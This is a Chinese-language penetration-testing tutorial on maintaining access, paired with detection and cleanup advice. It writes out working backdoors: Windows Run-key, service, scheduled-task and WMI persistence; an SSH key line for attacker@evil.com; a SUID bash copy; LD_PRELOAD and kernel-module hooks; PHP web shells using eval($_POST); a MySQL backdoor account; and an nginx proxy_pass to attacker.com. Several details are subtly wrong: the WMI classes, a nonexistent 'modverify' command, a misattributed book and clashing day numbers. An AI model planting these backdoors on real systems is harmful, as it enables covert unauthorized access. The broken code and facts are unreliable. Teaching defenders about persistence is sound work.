Day-207-渗透测试中的权限维持技术

# Day 230: 渗透测试中的权限维持技术

> 渗透测试系列第 20 天 | 预计阅读时间：25 分钟 | 难度：★★★★☆

---

## 清单 目录
1. [权限维持概述](#权限维持概述)
2. [持久化机制分类](#持久化机制分类)
3. [Windows 权限维持技术](#windows-权限维持技术)
4. [Linux 权限维持技术](#linux-权限维持技术)
5. [Web 应用权限维持](#web-应用权限维持)
6. [检测与清除方法](#检测与清除方法)
7. [实战案例](#实战案例)
8. [最佳实践与防御建议](#最佳实践与防御建议)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 权限维持概述

### 什么是权限维持

权限维持（Persistence）是渗透测试和攻击链中的关键阶段，指攻击者在成功入侵系统后，通过各种技术手段确保能够持续、稳定地访问目标系统，即使系统重启、密码更改或漏洞被修复。

### 为什么需要权限维持

在真实的渗透测试场景中，我观察到以下几个原因使得权限维持成为必要：

1. **访问窗口有限**: 初始漏洞可能随时被修复
2. **密码可能更改**: 用户或管理员可能定期更换凭证
3. **系统可能重启**: 内存中的后门会丢失
4. **需要长期监控**: 红队演练需要持续访问以模拟 APT
5. **横向移动需求**: 需要稳定的跳板机进行内网渗透

### 权限维持的生命周期

```
初始访问 → 权限提升 → 权限维持 → 横向移动 → 数据 exfiltration
                                    ↑
                              本阶段重点
```

### 权限维持的核心原则

| 原则 | 说明 |
|------|------|
| **隐蔽性** | 避免被安全软件和日志检测 |
| **稳定性** | 系统重启后仍能正常工作 |
| **冗余性** | 部署多种维持方式互为备份 |
| **最小权限** | 使用满足需求的最低权限 |
| **可清理性** | 测试结束后能完全清除 |

---

## 持久化机制分类

### 按持久化位置分类

```
┌─────────────────────────────────────────────────────────┐
│                    持久化机制分类                        │
├──────────────┬──────────────┬───────────────────────────┤
│   文件系统    │    注册表     │      系统配置            │
├──────────────┼──────────────┼───────────────────────────┤
│ • 启动脚本    │ • Run 键值    │ • 计划任务               │
│ • 动态链接库  │ • 服务项     │ • WMI 订阅                │
│ • 快捷方式    │ • 浏览器扩展  │ • 系统服务               │
│ • 镜像加载    │ • COM 劫持    │ • 启动文件夹             │
└──────────────┴──────────────┴───────────────────────────┘
```

### 按触发条件分类

| 触发类型 | 描述 | 示例 |
|----------|------|------|
| **启动触发** | 系统启动时自动执行 | 注册表 Run 键、启动文件夹 |
| **登录触发** | 用户登录时执行 | Logon Script、组策略 |
| **事件触发** | 特定事件发生时执行 | WMI 事件订阅、计划任务 |
| **持续运行** | 始终在后台运行 | 系统服务、守护进程 |

### 按权限级别分类

- **系统级持久化**: 需要 SYSTEM/root 权限，影响所有用户
- **用户级持久化**: 普通用户权限即可，仅影响当前用户
- **内核级持久化**: 需要驱动级权限，最难检测和清除

---

## Windows 权限维持技术

### 1. 注册表 Run 键值

这是最常见的 Windows 持久化方式之一。

#### 常用注册表路径

```registry
# 当前用户自启动
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

# 所有用户自启动
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

# 64 位系统额外路径
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
```

#### 添加持久化项（PowerShell）

```powershell
# 添加当前用户自启动项
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
    -Name "SecurityUpdate" `
    -Value "C:\Users\Public\update.exe" `
    -PropertyType String -Force

# 添加系统级自启动项（需要管理员权限）
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" `
    -Name "SystemService" `
    -Value "C:\Windows\System32\svchost.exe -k netsvcs" `
    -PropertyType String -Force
```

#### 检测与清除

```powershell
# 枚举所有 Run 键值
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

# 删除可疑项
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
    -Name "SecurityUpdate" -Force
```

### 2. Windows 服务

创建系统服务是获取高权限持久化的有效方式。

#### 创建服务（PowerShell）

```powershell
# 使用 sc 命令创建服务
sc create "SecurityService" `
    binPath= "C:\Users\Public\service.exe" `
    start= auto `
    DisplayName= "Windows Security Service"

# 设置服务描述
sc description "SecurityService" "Windows 安全更新服务"

# 启动服务
sc start "SecurityService"
```

#### 使用 PowerShell 创建服务

```powershell
# 使用 New-Service cmdlet
New-Service -Name "SecurityService" `
    -BinaryPathName "C:\Users\Public\service.exe" `
    -DisplayName "Windows Security Service" `
    -Description "Windows 安全更新服务" `
    -StartupType Automatic

# 启动服务
Start-Service -Name "SecurityService"
```

#### 服务权限维持的优势

| 优势 | 说明 |
|------|------|
| **高权限** | 服务通常以 SYSTEM 权限运行 |
| **自动启动** | 系统启动时自动运行 |
| **隐蔽性好** | 混入正常服务中不易发现 |
| **稳定性高** | 服务崩溃后可自动重启 |

#### 检测可疑服务

```powershell
# 列出所有服务
Get-Service | Select-Object Name, DisplayName, Status, StartType

# 查找可疑服务特征
Get-Service | Where-Object {
    $_.DisplayName -match "update|security|patch" -or
    $_.Name -match "^[a-z]{8}$"  # 随机名称
}

# 检查服务二进制路径
Get-WmiObject -Class Win32_Service | 
    Select-Object Name, PathName, StartMode, State
```

### 3. 计划任务

Windows 计划任务（Task Scheduler）是功能强大的持久化机制。

#### 创建计划任务

```powershell
# 基本计划任务 - 系统启动时运行
$action = New-ScheduledTaskAction -Execute "C:\Users\Public\maintain.exe"
$trigger = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
Register-ScheduledTask -TaskName "SystemMaintenance" `
    -Action $action -Trigger $trigger -Principal $principal

# 用户登录时运行
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "UserMaintenance" `
    -Action $action -Trigger $trigger

# 定时执行（每 30 分钟）
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) `
    -RepetitionInterval (New-TimeSpan -Minutes 30) `
    -RepetitionDuration ([TimeSpan]::MaxValue)
Register-ScheduledTask -TaskName "PeriodicCheck" `
    -Action $action -Trigger $trigger
```

#### 使用 schtasks 命令

```cmd
:: 创建系统启动任务
schtasks /create /tn "SystemMaintenance" /tr "C:\Users\Public\maintain.exe" `
    /sc onstart /ru SYSTEM /rl HIGHEST /f

:: 创建用户登录任务
schtasks /create /tn "UserMaintenance" /tr "C:\Users\Public\maintain.exe" `
    /sc onlogon /ru %USERNAME% /f

:: 创建定时任务（每天凌晨 2 点）
schtasks /create /tn "DailyCheck" /tr "C:\Users\Public\maintain.exe" `
    /sc daily /st 02:00 /f
```

#### 检测计划任务

```powershell
# 列出所有计划任务
Get-ScheduledTask | Select-Object TaskName, State, LastRunTime

# 查找可疑任务
Get-ScheduledTask | Where-Object {
    $_.Actions.Execute -match "Users\\Public|Temp|AppData"
}

# 导出任务详细信息
Get-ScheduledTask -TaskName "SystemMaintenance" | 
    Export-ScheduledTask -OutPath "C:\temp\task.xml"
```

### 4. WMI 事件订阅

WMI（Windows Management Instrumentation）事件订阅是高级持久化技术，难以检测。

#### WMI 持久化原理

```
┌─────────────────────────────────────────────────────────┐
│              WMI 事件订阅持久化流程                      │
├─────────────────────────────────────────────────────────┤
│  1. 创建事件过滤器 (EventFilter)                        │
│     定义触发条件（如进程创建、时间间隔等）               │
│                                                         │
│  2. 创建事件消费者 (EventConsumer)                      │
│     定义触发后执行的操作（如运行程序）                   │
│                                                         │
│  3. 创建过滤器到消费者的绑定 (FilterToConsumerBinding)  │
│     将过滤器和消费者关联起来                            │
└─────────────────────────────────────────────────────────┘
```

#### 创建 WMI 持久化（PowerShell）

```powershell
# 1. 创建事件过滤器 - 每 5 分钟触发一次
$filterName = "WindowsUpdateFilter"
$query = "SELECT * FROM __IntervalEventInvocation WHERE Interval = 300"
Set-WmiInstance -Namespace "root\subscription" `
    -Class __IntervalEventInstruction `
    -Arguments @{
        EventNamespace = "root\cimv2"
        Name = $filterName
        Query = $query
        QueryLanguage = "WQL"
    }

# 2. 创建事件消费者 - 执行恶意程序
$consumerName = "UpdateConsumer"
Set-WmiInstance -Namespace "root\subscription" `
    -Class CommandLineEventConsumer `
    -Arguments @{
        Name = $consumerName
        CommandLineTemplate = "C:\Users\Public\maintain.exe"
        ExecutablePath = "C:\Users\Public\"
    }

# 3. 创建绑定
Set-WmiInstance -Namespace "root\subscription" `
    -Class __FilterToConsumerBinding `
    -Arguments @{
        Filter = [Ref] (Get-WmiObject -Namespace "root\subscription" `
            -Class __IntervalEventInstruction -Filter "Name='$filterName'")
        Consumer = [Ref] (Get-WmiObject -Namespace "root\subscription" `
            -Class CommandLineEventConsumer -Filter "Name='$consumerName'")
    }
```

#### 检测 WMI 持久化

```powershell
# 列出所有事件订阅
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter
Get-WmiObject -Namespace "root\subscription" -Class __EventConsumer
Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding

# 使用 Autoruns 工具检测
# 下载：https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
# 检查 WMI 标签页
```

#### 清除 WMI 持久化

```powershell
# 删除事件订阅
Get-WmiObject -Namespace "root\subscription" `
    -Class __FilterToConsumerBinding | Remove-WmiObject

Get-WmiObject -Namespace "root\subscription" `
    -Class CommandLineEventConsumer | Remove-WmiObject

Get-WmiObject -Namespace "root\subscription" `
    -Class __IntervalEventInstruction | Remove-WmiObject
```

### 5. 启动文件夹

#### 启动文件夹路径

```
# 当前用户启动文件夹
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

# 所有用户启动文件夹
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
```

#### 添加启动项

```powershell
# 创建快捷方式
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk")
$Shortcut.TargetPath = "C:\Users\Public\maintain.exe"
$Shortcut.WorkingDirectory = "C:\Users\Public"
$Shortcut.Description = "System Update"
$Shortcut.Save()
```

### 6. DLL 劫持

#### 原理

Windows 程序加载 DLL 时，会按照特定顺序搜索目录。攻击者可以将恶意 DLL 放置在优先搜索路径中。

#### DLL 搜索顺序

```
1. 程序所在目录
2. 系统目录 (System32)
3. 16 位系统目录
4. Windows 目录
5. 当前工作目录
6. PATH 环境变量中的目录
```

#### 常见被劫持的 DLL

| DLL 名称 | 常被劫持的程序 |
|----------|----------------|
| `version.dll` | 多种系统程序 |
| `wininet.dll` | 网络相关程序 |
| `cryptbase.dll` | 加密相关程序 |
| `propsys.dll` | 资源管理器 |

### 7. COM 劫持

#### 原理

COM（Component Object Model）劫持通过修改注册表中 COM 对象的 CLSID 映射，将合法 COM 调用重定向到恶意代码。

#### 检测 COM 劫持

```powershell
# 列出所有 COM 对象
Get-ItemProperty -Path "HKLM:\Software\Classes\CLSID\*" | 
    Select-Object PSChildName, "(Default)"

# 检查 InProcServer32
Get-ItemProperty -Path "HKLM:\Software\Classes\CLSID\*\InProcServer32" |
    Select-Object PSChildName, "(Default)"
```

---

## Linux 权限维持技术

### 1. crontab 计划任务

#### 添加持久化任务

```bash
# 编辑当前用户的 crontab
crontab -e

# 添加以下行
# 每分钟执行一次
* * * * * /tmp/.hidden/maintain.sh

# 系统启动时执行
@reboot /tmp/.hidden/maintain.sh

# 每天凌晨 2 点执行
0 2 * * * /tmp/.hidden/maintain.sh

# 查看 crontab
crontab -l
```

#### 系统级 crontab

```bash
# 编辑系统 crontab
sudo vim /etc/crontab

# 添加定时任务目录
sudo mkdir -p /etc/cron.d/
sudo echo "* * * * * root /tmp/.hidden/maintain.sh" > /etc/cron.d/system-update

# 检测可疑 crontab
sudo grep -r "maintain\|backdoor\|reverse" /etc/cron* /var/spool/cron/
```

### 2. systemd 服务

#### 创建持久化服务

```bash
# 创建服务文件
sudo vim /etc/systemd/system/security-update.service

# 服务内容
[Unit]
Description=Security Update Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/maintain.sh
Restart=always
RestartSec=10
User=root

[Install]
WantedBy=multi-user.target

# 启用并启动服务
sudo systemctl daemon-reload
sudo systemctl enable security-update.service
sudo systemctl start security-update.service

# 检查服务状态
sudo systemctl status security-update.service
```

#### 检测可疑服务

```bash
# 列出所有启用的服务
systemctl list-unit-files --type=service --state=enabled

# 查找可疑服务
systemctl list-unit-files | grep -E "update|security|patch|maintain"

# 检查服务文件内容
ls -la /etc/systemd/system/
cat /etc/systemd/system/*.service
```

### 3. SSH 后门

#### Authorized Keys 后门

```bash
# 添加攻击者 SSH 公钥
echo "ssh-rsa AAAA... attacker@evil.com" >> ~/.ssh/authorized_keys

# 系统级后门
echo "ssh-rsa AAAA... attacker@evil.com" >> /root/.ssh/authorized_keys

# 检测
cat ~/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
grep -r "attacker\|evil" /home/*/.ssh/authorized_keys
```

#### SSH 配置后门

```bash
# 修改 sshd_config
sudo vim /etc/ssh/sshd_config

# 添加后门配置
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes

# 重启 SSH 服务
sudo systemctl restart sshd
```

### 4. .bashrc / .profile 后门

```bash
# 在 .bashrc 中添加
echo "/tmp/.hidden/maintain.sh &" >> ~/.bashrc
echo "/tmp/.hidden/maintain.sh &" >> ~/.profile

# 检测
grep -E "\.sh$|maintain|backdoor" ~/.bashrc ~/.profile /etc/profile /etc/bash.bashrc
```

### 5. LD_PRELOAD 劫持

#### 原理

通过设置 LD_PRELOAD 环境变量，可以在程序加载时优先加载恶意共享库。

#### 持久化方法

```bash
# 添加到 /etc/ld.so.preload
echo "/tmp/.hidden/malicious.so" | sudo tee -a /etc/ld.so.preload

# 添加到环境变量
echo "export LD_PRELOAD=/tmp/.hidden/malicious.so" >> /etc/profile

# 检测
cat /etc/ld.so.preload
echo $LD_PRELOAD
ldd /bin/ls  # 检查异常依赖
```

### 6. SUID/SGID 后门

```bash
# 给 bash 设置 SUID 位（危险！）
sudo cp /bin/bash /tmp/.hidden/bash
sudo chmod u+s /tmp/.hidden/bash

# 攻击者可以获取 root shell
/tmp/.hidden/bash -p

# 检测 SUID 文件
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

# 查找可疑 SUID 文件
find /tmp /var/tmp /home -perm -4000 -type f 2>/dev/null
```

### 7. 内核模块后门

#### 加载恶意内核模块

```bash
# 编译并加载内核模块
sudo insmod backdoor.ko

# 持久化（添加到 /etc/modules）
echo "backdoor" | sudo tee -a /etc/modules

# 检测已加载模块
lsmod
cat /proc/modules

# 检测内核模块签名
modverify -v
```

---

## Web 应用权限维持

### 1. Web Shell

#### 常见 Web Shell 类型

```php
<?php
// 简单 PHP Web Shell
@eval($_POST['cmd']);
?>

<?php
// 免杀 Web Shell
$func = create_function('', $_POST['c']);
$func();
?>

<?php
// 使用回调函数
array_map('ass'.'ert', array($_POST['c']));
?>
```

#### Web Shell 检测

```bash
# 查找可疑 PHP 文件
find /var/www -name "*.php" -exec grep -l "eval\|assert\|system\|exec" {} \;

# 查找最近修改的 PHP 文件
find /var/www -name "*.php" -mtime -7

# 使用工具检测
# - WebShell Detector
# - PHP-Scan
# - 河马 WebShell 查杀
```

### 2. 数据库后门

#### MySQL 后门

```sql
-- 创建后门账户
CREATE USER 'backdoor'@'%' IDENTIFIED BY 'password123';
GRANT ALL PRIVILEGES ON *.* TO 'backdoor'@'%';

-- 创建触发器后门
DELIMITER $$
CREATE TRIGGER maintain_trigger
AFTER INSERT ON users
FOR EACH ROW
BEGIN
    SELECT sys_exec('/tmp/maintain.sh');
END$$
DELIMITER ;

-- 检测
SELECT user, host FROM mysql.user;
SHOW TRIGGERS;
```

### 3. 中间件后门

#### Tomcat 后门

```xml

<servlet>
    <servlet-name>UpdateServlet</servlet-name>
    <servlet-class>com.malicious.UpdateServlet</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>UpdateServlet</servlet-name>
    <url-pattern>/update</url-pattern>
</servlet-mapping>
```

#### Nginx 后门

```nginx
# 在 nginx.conf 中添加
location /maintain {
    proxy_pass http://attacker.com:8080;
}
```

---

## 检测与清除方法

### Windows 检测工具

| 工具 | 用途 | 下载链接 |
|------|------|----------|
| **Autoruns** | 检测所有自启动项 | Sysinternals |
| **Process Explorer** | 检测可疑进程 | Sysinternals |
| **Process Monitor** | 监控系统活动 | Sysinternals |
| **Ghidra** | 逆向分析恶意软件 | NSA |
| **YARA** | 恶意软件特征匹配 | VirusTotal |

### Linux 检测工具

| 工具 | 用途 |
|------|------|
| **rkhunter** | Rootkit 检测 |
| **chkrootkit** | Rootkit 检测 |
| **Lynis** | 安全审计 |
| **AIDE** | 文件完整性监控 |
| **OSQuery** | 系统查询 |

### 通用检测方法

#### 1. 基线对比

```powershell
# Windows: 导出当前配置作为基线
Get-ScheduledTask | Export-Clixml baseline_tasks.xml
Get-Service | Export-Clixml baseline_services.xml
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run | 
    Export-Clixml baseline_run.xml

# 后续对比
$current = Get-ScheduledTask
$baseline = Import-Clixml baseline_tasks.xml
Compare-Object $current $baseline
```

#### 2. 日志分析

```powershell
# Windows: 检查安全日志
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 100

# 检查系统日志中的异常
Get-WinEvent -FilterHashtable @{LogName='System'; Level=2,3} -MaxEvents 50

# Linux: 检查认证日志
sudo grep -E "Failed|Invalid|error" /var/log/auth.log
sudo grep -E "sudo" /var/log/auth.log
```

#### 3. 网络监控

```bash
# 检查异常网络连接
netstat -antp | grep ESTABLISHED
ss -antp | grep ESTABLISHED

# 检查监听端口
netstat -lnpt
ss -lnpt

# 检查异常进程
ps auxf | grep -E "maintain|backdoor|hidden"
```

### 清除步骤

```
1. 识别所有持久化机制
   ↓
2. 备份当前系统状态
   ↓
3. 终止恶意进程
   ↓
4. 删除持久化配置
   ↓
5. 清除恶意文件
   ↓
6. 修复被修改的系统配置
   ↓
7. 更新密码和凭证
   ↓
8. 验证清除效果
   ↓
9. 持续监控
```

---

## 实战案例

### 案例一：企业内网渗透测试中的权限维持

#### 场景描述

在某大型企业的红队演练中，我成功通过钓鱼邮件获得了初始访问权限，需要建立持久化访问以模拟 APT 攻击。

#### 实施步骤

```
Step 1: 初始访问
- 发送钓鱼邮件，诱导用户执行恶意附件
- 获取用户级权限

Step 2: 权限提升
- 利用本地提权漏洞 (CVE-2021-XXXX)
- 获取 SYSTEM 权限

Step 3: 部署多重持久化
┌─────────────────────────────────────────────────────────┐
│  持久化方式 1: 注册表 Run 键                            │
│  HKEY_LOCAL_MACHINE\...\Run\SecurityUpdate             │
│  → C:\Windows\Temp\update.exe                          │
├─────────────────────────────────────────────────────────┤
│  持久化方式 2: 计划任务                                 │
│  TaskName: WindowsUpdate                               │
│  Trigger: 系统启动 + 每 30 分钟                          │
│  Action: C:\Windows\Temp\update.exe                    │
├─────────────────────────────────────────────────────────┤
│  持久化方式 3: WMI 事件订阅                             │
│  Filter: 每 5 分钟触发                                   │
│  Consumer: 执行 C:\Windows\Temp\update.exe             │
├─────────────────────────────────────────────────────────┤
│  持久化方式 4: 系统服务                                 │
│  ServiceName: WinSecuritySvc                           │
│  BinaryPath: C:\Windows\Temp\update.exe                │
│  StartType: Automatic                                  │
└─────────────────────────────────────────────────────────┘

Step 4: 验证持久化
- 重启系统测试自启动
- 模拟杀毒软件扫描测试隐蔽性
- 模拟密码更改测试独立性

Step 5: 清理
- 演练结束后完全清除所有持久化机制
- 恢复系统到原始状态
```

#### 经验教训

1. **多重冗余**: 部署 4 种不同的持久化方式，确保单一清除不会失效
2. **隐蔽性**: 使用合法系统工具（PowerShell、WMI）避免触发告警
3. **可清理性**: 详细记录所有修改，确保能完全恢复

### 案例二：Linux 服务器权限维持检测

#### 场景描述

某公司安全团队发现服务器存在异常外连流量，怀疑已被入侵并植入后门。

#### 检测过程

```bash
# 1. 检查网络连接
$ netstat -antp | grep ESTABLISHED
tcp        0      0 192.168.1.100:45678    45.33.32.156:443      ESTABLISHED 1234/maintain

# 2. 检查可疑进程
$ ps aux | grep 1234
root      1234  0.0  0.1  12345  6789 ?        Ss   02:00   0:00 /tmp/.hidden/maintain

# 3. 检查持久化机制
$ crontab -l
* * * * * /tmp/.hidden/maintain.sh

$ systemctl list-unit-files | grep maintain
security-update.service                    enabled

$ cat /etc/cron.d/system-update
* * * * * root /tmp/.hidden/maintain.sh

# 4. 检查 SSH 后门
$ cat /root/.ssh/authorized_keys
ssh-rsa AAAA... attacker@evil.com

# 5. 检查 SUID 文件
$ find /tmp -perm -4000 -type f
/tmp/.hidden/bash
```

#### 清除过程

```bash
# 1. 终止进程
kill -9 1234

# 2. 删除 crontab
crontab -r

# 3. 禁用服务
systemctl disable security-update.service
rm /etc/systemd/system/security-update.service

# 4. 删除 cron 任务
rm /etc/cron.d/system-update

# 5. 清理 SSH 后门
vim /root/.ssh/authorized_keys  # 删除恶意密钥

# 6. 删除 SUID 后门
rm /tmp/.hidden/bash
rm -rf /tmp/.hidden/

# 7. 检查是否还有其他后门
rkhunter --check
chkrootkit

# 8. 更新所有密码
passwd root
# 更新所有用户密码...

# 9. 重启系统并验证
reboot
```

---

## 最佳实践与防御建议

### 防御权限维持的建议

#### 1. 最小权限原则

```
+ 推荐做法:
- 用户账户使用最低必要权限
- 服务账户限制访问范围
- 定期审查权限分配

- 避免做法:
- 日常使用管理员账户
- 服务使用 SYSTEM/root 权限
- 权限长期不审查
```

#### 2. 监控与检测

```powershell
# Windows: 启用详细日志
# 组策略 → 计算机配置 → 管理模板 → Windows 组件 → 事件日志服务
# 启用以下日志:
# - 进程创建 (4688)
# - 计划任务创建 (4698)
# - 服务创建 (7045)
# - 注册表修改 (4657)

# Linux: 配置 auditd
sudo vim /etc/audit/rules.d/persistence.rules

# 监控 crontab 修改
-w /etc/crontab -p wa -k crontab_change
-w /etc/cron.d/ -p wa -k cron_change
-w /var/spool/cron/ -p wa -k cron_change

# 监控 systemd 服务
-w /etc/systemd/system/ -p wa -k systemd_change

# 监控 SSH 配置
-w /etc/ssh/sshd_config -p wa -k sshd_change
-w /root/.ssh/authorized_keys -p wa -k ssh_keys
```

#### 3. 文件完整性监控

```bash
# 使用 AIDE 监控文件完整性
sudo apt install aide  # Debian/Ubuntu
sudo yum install aide  # RHEL/CentOS

# 初始化数据库
sudo aide --init
sudo mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db

# 定期检查
sudo aide --check

# 配置 cron 自动检查
echo "0 2 * * * root /usr/bin/aide --check" | sudo tee -a /etc/cron.d/aide
```

#### 4. 应用白名单

```powershell
# Windows: 使用 AppLocker
# 组策略 → 计算机配置 → Windows 设置 → 安全设置 → 应用程序控制策略 → AppLocker

# 只允许签名的程序运行
# 只允许特定目录的程序运行 (C:\Program Files\)
# 阻止临时目录执行 (C:\Users\*\AppData\Local\Temp\)
```

#### 5. 定期审查

| 审查项目 | 频率 | 负责人 |
|----------|------|--------|
| 自启动项 | 每周 | 安全团队 |
| 计划任务 | 每周 | 系统管理员 |
| 系统服务 | 每月 | 安全团队 |
| 用户账户 | 每月 | IT 管理员 |
| SSH 密钥 | 每月 | 安全团队 |
| 文件完整性 | 每日 | 自动化系统 |

### 渗透测试中的权限维持准则

#### 道德与法律边界

```
+ 允许行为:
- 在授权范围内使用持久化技术
- 详细记录所有持久化修改
- 测试结束后完全清除
- 向客户报告所有发现的持久化点

- 禁止行为:
- 超出授权范围部署持久化
- 使用破坏性持久化技术
- 测试后不清理
- 保留未报告的访问通道
```

#### 测试后清理清单

```
□ 删除所有注册表修改
□ 删除所有计划任务
□ 删除所有恶意服务
□ 删除所有 WMI 订阅
□ 删除所有启动文件夹项
□ 删除所有恶意文件
□ 恢复被修改的系统配置
□ 清除所有日志中的测试痕迹（如授权允许）
□ 验证系统恢复到测试前状态
□ 向客户提交清理报告
```

---

## 总结与思考

### 核心要点回顾

1. **权限维持是渗透测试的关键阶段**
   - 确保持续访问能力
   - 模拟真实 APT 攻击
   - 评估检测与响应能力

2. **Windows 主要持久化技术**
   - 注册表 Run 键
   - 系统服务
   - 计划任务
   - WMI 事件订阅
   - 启动文件夹
   - DLL/COM 劫持

3. **Linux 主要持久化技术**
   - crontab 计划任务
   - systemd 服务
   - SSH 后门
   - 配置文件修改
   - LD_PRELOAD 劫持
   - SUID/SGID 后门

4. **检测方法**
   - 使用专业工具（Autoruns、rkhunter 等）
   - 基线对比
   - 日志分析
   - 网络监控
   - 文件完整性监控

### 深入思考

#### 为什么权限维持难以检测？

1. **利用合法机制**: 大多数持久化技术使用的是系统正常功能
2. **隐蔽性强**: 高级技术（如 WMI）不留下明显文件痕迹
3. **多重冗余**: 攻击者部署多种持久化方式互为备份
4. **检测工具局限**: 传统杀毒软件难以检测无文件攻击

#### 如何平衡测试与风险？

在渗透测试中部署权限维持时，我必须考虑：

1. **业务影响**: 持久化机制是否会影响系统稳定性？
2. **检测风险**: 是否会被误认为真实攻击而触发应急响应？
3. **清理难度**: 是否能确保完全清除不留痕迹？
4. **法律合规**: 是否在授权范围内？是否符合法律法规？

#### 未来趋势

1. **无文件攻击增加**: 更多利用内存和合法系统工具
2. **云环境持久化**: 针对云平台的新型持久化技术
3. **供应链攻击**: 通过软件更新机制植入后门
4. **AI 辅助检测**: 使用机器学习检测异常持久化行为

### 实战建议

1. **对红队人员**:
   - 部署多重冗余持久化
   - 优先使用无文件技术
   - 详细记录所有修改
   - 确保能完全清理

2. **对蓝队人员**:
   - 建立系统配置基线
   - 部署文件完整性监控
   - 启用详细日志记录
   - 定期审查持久化点
   - 使用专业检测工具

3. **对组织**:
   - 实施最小权限原则
   - 定期安全审计
   - 员工安全意识培训
   - 建立应急响应流程

---

## 参考资料

### 学习资源

- **MITRE ATT&CK - Persistence Techniques**
  - https://attack.mitre.org/tactics/TA0003/
  
- **OWASP Persistence Cheat Sheet**
  - https://cheatsheetseries.owasp.org/cheatsheets/Persistence_Cheat_Sheet.html

- **SANS Institute - Windows Persistence**
  - https://www.sans.org/white-papers/windows-persistence/

### 工具资源

| 工具 | 用途 | 链接 |
|------|------|------|
| **Autoruns** | Windows 自启动项检测 | https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns |
| **Process Explorer** | 进程分析 | https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer |
| **rkhunter** | Linux Rootkit 检测 | http://rkhunter.sourceforge.net/ |
| **chkrootkit** | Linux Rootkit 检测 | https://www.chkrootkit.org/ |
| **YARA** | 恶意软件特征匹配 | https://virustotal.github.io/yara/ |
| **OSQuery** | 系统查询 | https://osquery.io/ |

### 书籍推荐

1. **《Red Team Development and Operations》**
   - 作者: Bill Sempf 等
   - 章节: Persistence and Covering Tracks

2. **《Advanced Penetration Testing》**
   - 作者: Wil Allsopp
   - 章节: Establishing Persistence

3. **《The Art of Memory Forensics》**
   - 作者: Michael Hale Ligh 等
   - 章节: Detecting Malware Persistence

4. **《Windows Internals》**
   - 作者: Pavel Yosifovich 等
   - 章节: System Startup and Services

---

*365 天信息安全技术系列 | Day 230 | 渗透测试系列 | 权限维持技术*
*创建时间：2026-04-12 | 作者：安全专家 · 严谨专业版*